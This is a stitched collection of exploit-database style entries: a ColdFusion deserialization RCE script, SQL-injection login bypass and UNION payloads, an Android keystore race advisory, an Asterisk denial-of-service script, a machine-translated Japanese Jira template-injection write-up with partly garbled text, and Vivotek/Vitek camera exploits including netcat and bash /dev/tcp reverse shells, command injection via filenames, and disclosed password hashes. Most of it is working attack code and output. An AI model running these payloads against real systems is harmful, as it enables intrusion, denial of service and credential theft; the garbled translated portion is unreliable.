# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.
import struct
import sys
import requests
if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()
target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any authentication.
# # # # #
# Proof of Concept :
# 1) First go to login page .
# 2) Username : anything , Password : ' or 'x'='x
PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html
Test : http://server/login.php?lerr
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:
1. KeyStoreServiceReturnCode KeyStoreService::generateKey(const String16& name,
2. const hidl_vec<KeyParameter>& params,
3. const hidl_vec<uint8_t>& entropy, int uid,
4. int flags,
5. KeyCharacteristics* outCharacteristics) {
6. uid = getEffectiveUid(uid);
7. KeyStoreServiceReturnCode rc =
8. checkBinderPermissionAndKeystoreState(P_INSERT, uid, flags & KEYSTORE_FLAG_ENCRYPTED);
9. if (!rc.isOk()) {
10. return rc;
11. }
12. if ((flags & KEYSTORE_FLAG_CRITICAL_TO_DEVICE_ENCRYPTION) && get_app_id(uid) != AID_SYSTEM) {
13. ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
14. return ResponseCode::PERMISSION_DENIED;
15. }
16.
17. if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
18. if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
19. }
20. ...
21. }
Like most KeyStore calls, this method uses "KeyStoreService::checkBinderPermission" in order to validate the calling process's permissions. This function uses a twofold approach to verify the caller (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#checkBinderPermission):
1. The caller's UID is retrieved using IPCThreadState::self()->getCallingUid() and compared against an array of pre-populated UIDs and permissions ("user_perms")
1.1 If the UID matches any in the array, its permission set is retrieved from the array
1.2 If the UID isn't in the array, the default permission set is used ("DEFAULT_PERMS")
2. The caller's SELinux context is retrieved using getpidcon(...) using the PID from the binder transaction (IPCThreadState::self()->getCallingPid())
2.1 An SELinux access check is performed for the given context and operation
Specifically to our case, if a "generateKey" command is called with a "INCLUDE_UNIQUE_ID" tag, the KeyStore will use an attestation certificate for the generated key with an application-scoped and time-bounded device-unique ID. Since creating attestation keys is a privileged operation, it should not be carried out by any user.
This restriction is enforced using the SELinux context enforcement alone -- the "default" permission set ("DEFAULT_PERMS") contains the aforementioned permission:
static const perm_t DEFAULT_PERMS = static_cast<perm_t>(
P_GET_STATE | P_GET | P_INSERT | P_DELETE | P_EXIST | P_LIST | P_SIGN | P_VERIFY |
P_GEN_UNIQUE_ID /* Only privileged apps can do this, but enforcement is done by SELinux */);
As noted in the comment above, this API is restricted to "priv_app" SELinux contexts, which is enforced using validation #2 above.
However, using the calling PID in order to enforce access controls in binder calls is an invalid approach. This is since the calling PID can transition from zombie to dead, allowing other PIDs to take its place. Therefore, the following attack flow is possible:
1. Process A forks and creates process B
2. Process A cycles pids until it reaches the pid before its own
3. Process B issues a binder transaction for the KeyStore service, containing an INCLUDE_UNIQUE_ID tag
4. Process A kills process B, allowing it to transition to dead
5. Process A spawns a new "priv_app" instance, occupying process B's PID
If points 4-5 are completed before the KeyStore service performs the "getpidcon" call, the permission check will use the new app's SELinux context, allowing the access control checks to pass. Otherwise, since no ill effects happen if the race fails, an attacker can continue issuing calls until the race succeeds.
As for spawning a new "priv_app" instance, this can be achieved by issuing a query request to a content provider published by a "priv_app". Many such providers exist (the contacts provider, telephony provider, settings provider, etc.). In this case, I chose to use the "calendar" provider, as it was not running on the device to begin with (and is therefore had to be spawned in order to handle the query request).
In order to expand the timing window for the PoC, I've added a "sleep" call to the KeyStore service's "generateKey" call. You can find the patch under "keystore.diff".
After applying the patch, the attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/keystorerace", and running a build (e.g., "mmm keystorerace"). The resulting binary ("keystorerace") contains the PoC code. Running it should result in a new device-unique key being generated, despite not being executed from a "priv_app".
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43996.zip
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 - AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000
import binascii
import sys
import socket
import time
def asteriskSCCP(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open(fileLog, "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()
# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print 'Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"
def howtouse():
print "Usage: AsteriskSCCP.py Hostname Port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)
if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])
print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
asteriskSCCP(target, port)
except IndexError:
howtouse()
# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
# Version: 2.0.7
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :
SQLi:
# server/login.php?normal&cid=[SQL]
# Parameter : cid (GET)
# Type: UNION QUERY
# Title: Generic UNION query (NULL) - 5 columns
# payload : /*!00000UNION*/ ALL SELECT
NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL
/*!00000from*/ information_schema.columns where table_schema=schema()%23
Test :
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23
0x00脆弱性の説明
Atlassian Jiraは、Atlassian Australiaの欠陥追跡管理システムです。このシステムは、主に仕事のさまざまな問題や欠陥を追跡および管理するために使用されます。
Atlassian Jira ServerとJira Data Centerには、サーバー側のテンプレートインジェクションの脆弱性があります。この脆弱性をうまく活用する攻撃者は、JIRAサーバーまたはJIRAデータセンターの影響を受けたバージョンを実行しているサーバー上で任意のコマンドを実行し、サーバーの権限を取得し、ネットワーク資産を真剣に危険にさらすことができます。
0x01 CVE番号
CVE-2019-11581
0x02脆弱性ハザードレベル
高リスク
0x03脆弱性衝撃範囲
Atlassianjira 4.4.xatlassianjira 5.x.xatlassianjira 6.x.xatlassianjira 7.0.x
Atlassianjira 7.1.x
Atlassianjira 7.2.xatlassianjira 7.3.xatlassianjira 7.4.xatlassianjira 7.5.5.xatlassianjira 7.6.x 7.6.14.x 7.6.14.xatlassianjira 7.8.xatlassianjira 7.9.xatlassianjira 7.10.xatlasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslass 7.11.xatlassianjira 7.12.xatlassianjira 7.13.x 7.13.5atlassianjira 8.0.x 8.0.3atlassianjira 8.1.x 8.1.2atlassianjira 8.2.x 8.2.33
0x04脆弱性分析
1。使用率の前提条件:最初のタイプは不正なコード実行の使用率です:JiraはSMTPサーバーを構成し、「連絡先Webサイト管理者フォーム」機能を有効にする必要があります。 (実際、Webインターフェイス設計から、SMTPサーバーが構成されていない場合、この機能を有効にすることはできません
2番目の利用シナリオは、JIRA管理者の許可を取得することであり、利用条件を満たすのは困難です。ここでは、主に最初の状況を分析します。その理由は、Atlassian-Jira/web-inf/classs/com/aTlassian/jira/coms/action/contactAdministratorsが被験者(メールの件名)をフィルタリングしないため、ユーザーによる受信電子メール被験者はテンプレート(テンプレート)の指示として実行されます。どちらの場合でも、この脆弱性をうまく活用する攻撃者は、JIRAサーバーまたはJIRAデータセンターの影響を受けたバージョンを実行しているシステム上の任意のコマンドを実行できます。
2。URLの脆弱性の脆弱性を検証する次の2つの方法:最初のタイプは管理者アカウント許可を必要としません:http://10.206.1.8:8080/Secure/ContactAdministrators!default.jspa
2番目のタイプには、管理者アカウント許可が必要です:http://10.206.1.8:8080/secure/admin/sendbulkmail!default.jspa
次の実行バージョン番号が発生した場合、脆弱性があります。
0x05脆弱性の再発
1。脆弱性の条件については、管理者部門に連絡してください(バックエンド管理者アカウントとパスワードを知る必要があります)
2。環境の準備:Atlassian Jirav7.13.0(このバージョンを例にとると、このバージョンには脆弱性があります)ダウンロードアドレス:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe
インストールプロセスは説明されなくなりました(プロンプトによると、最初にアカウントを公式に登録してから、試用シリアル番号を取得してインストールします)。電子メールの構成ステップが選択された後(デフォルトは)、バックグラウンド構成を入力することに注意してください。
3.ログインしていないときに脆弱性が存在することを確認するには、次のURLにアクセスします(管理者アカウントの許可は不要です)。
http://10.206.1.83:8080/secure/contactAdministrators!default.jspa
プロンプトが次の場合、これは脆弱性を構成なしでトリガーできないことを意味します。
バックグラウンドにログインして、管理者に連絡してください。構成アドレスは次のとおりです。
http://10.10.20.116:8080/secure/admin/editapplicationproperties!default.jspa
デフォルトはオフです。メッセージをオンにする前に、メッセージを送信するようにSTMPを構成する必要があります。 STMPが構成されている場合、接続をテストできます。サーバーはポート25を開く必要があります。そうしないと、メールを送信できません。次の図は、それが正常に有効になっていることを示しています。
4。脆弱性アクセスは、ログインが進行中でないときにトリガーされます
http://10.206.1.83:8080/secure/contactAdministrators!default.jspa
被験者のペイロードを入力します。ここの環境はWindowsマシンであるため、アカウントを追加して観察できることに注意してください。 Linuxは、リバウンドシェルなどのコードを使用できます。とにかく、実行するコマンドに置き換えられます。
$ i18n.getclass()。forname( 'java.lang.runtime')。getMethod( 'getruntime'、null).invoke(null、null).exec( 'net user bk abc@abc123 /add')。
は、電子メールキューに参加したいので、送信後しばらく待つことができます。この時点で、サーバーに移動してネットユーザーを実行して確認し、コマンドを実行して追加したアカウントであることがわかります。
5.管理者アカウントにログインし、脆弱性をトリガーします。管理者アカウントにログインしてから、次のURLにアクセスします。
http://10.206.1.83:8080/secure/admin/sendbulkmail!default.jspa
ペイロードを入力して、次のように、コマンドを実行してアカウント名を追加してください
$ i18n.getClass()。forName( 'java.lang.runtime')。getMethod( 'getRuntime'、null).invoke(null、null).exec( 'net user bk01 abc@abc123 /add')。
Linuxの下で実行可能:
ターゲットJIRAシステム実行可能性POC
$ i18n.getclass()。forname( 'java.lang.runtime')。getMethod( 'getruntime'、null).invoke(null、null).exec( 'curl http://www.baidu.com')。
$ i18n.getClass()。forName( 'java.lang.runtime')。getMethod( 'getruntime'、null).invoke(null、null).exec( 'bash -i/dev/tcp/攻撃者IP/2333 01')。
攻撃者ホストは:NC -LVVP 2333を実行します
0x06脆弱性修正
1。一時的な処分の提案JIRAを時間内にアップグレードできない場合、次の緩和策を講じることができます。
1. http://IP:port/secure/contactAdministratorsへのアクセスを無効にします!default.jspa
2。連絡先のウェブサイト管理者フォーム関数をオフにすると、特定の手順は次のように:です
設定=system=edit settings=[管理者]フォームに連絡して[オフ]を選択し、下部に[更新]をクリックして設定を保存します。
EDIT設定
連絡先Webサイト管理者フォーム機能を閉じます
2。処分の提案1。脆弱性の影響を受けないバージョンにアップグレードします。
2。http://IP:port/secure/admin/sendbulkmail!default.jspaのソースIPへのアクセスを制限します
0x07参照
https://MP.WEIXIN.QQ.COM/S/D2YVSYRZXPZRPCAKMQARSW
https://mp.weixin.qqq.com/s/_tsq9p1pqyszjt2vaxd61a
https://paper.seebug.org/982/
https://www.jiansshu.com/p/ddf1233d333f
https://github.com/jas502n/cve-2019-11581
https://www.jiansshu.com/p/ddf1233d333f
http://byximcx.cn/post-158.html
[STX]
Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher
Device Model:
CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS,
FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA,
FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1,
FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379,
FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2,
FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377,
IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564,
MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more
Download Updated Firmware: http://www.vivotek.com/firmware/
[Timeline]
October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.
[Details]
Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek.
The stack overflow is triggered by "PUT" or "POST" request:
[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n
However,
the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack:
"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request:
"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
Notes:
1. B to I = $R4-$R11; X = $PC
2. Size of request availible in $R3 at the LDMFD
3. Max request size: 9182 bytes (0x1FFF)
4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx)
5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes
6. Stack not protected with "Stack canaries"
7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a;
8. heap: Non-executable + Non-ASLR
9. stack: Non-executable + ASLR
[PoC]
$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76eb2c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x75 117
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7e92dac0 0x7e92dac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76e82c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x4f 79
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7ec9cac0 0x7ec9cac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
Have a nice day
/bashis
[ETX]
[STX]
Subject: Vitek RCE and Information Disclosure (and possible other OEM)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day
heap: Executable + Non-ASLR
stack: Executable + ASLR
-[Manufacture Logo]-
_ _ _ _ _ _ _ _ _ _ _ _
\ _ _ _ _ _ ___
/ /__/ \ |_/
/ __ / - _ ___
/ / / / / /
_ _ _ _/ / / \_/ \_ ______
___________\___\__________________
-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC
-[Stack Overflow RCE]-
[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$
Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0
H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system
H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system
N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system
-[PHP RCE]-
Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)
[Reverse netcat shell (forking)]
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST
200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$
-[Login / Password Disclosure]-
curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]
Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
-[Hardcode l/p]-
FTP: TCP/10021
TELNET: TCP/10023
/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh
-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$
$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.
-[Other Information Disclosure]-
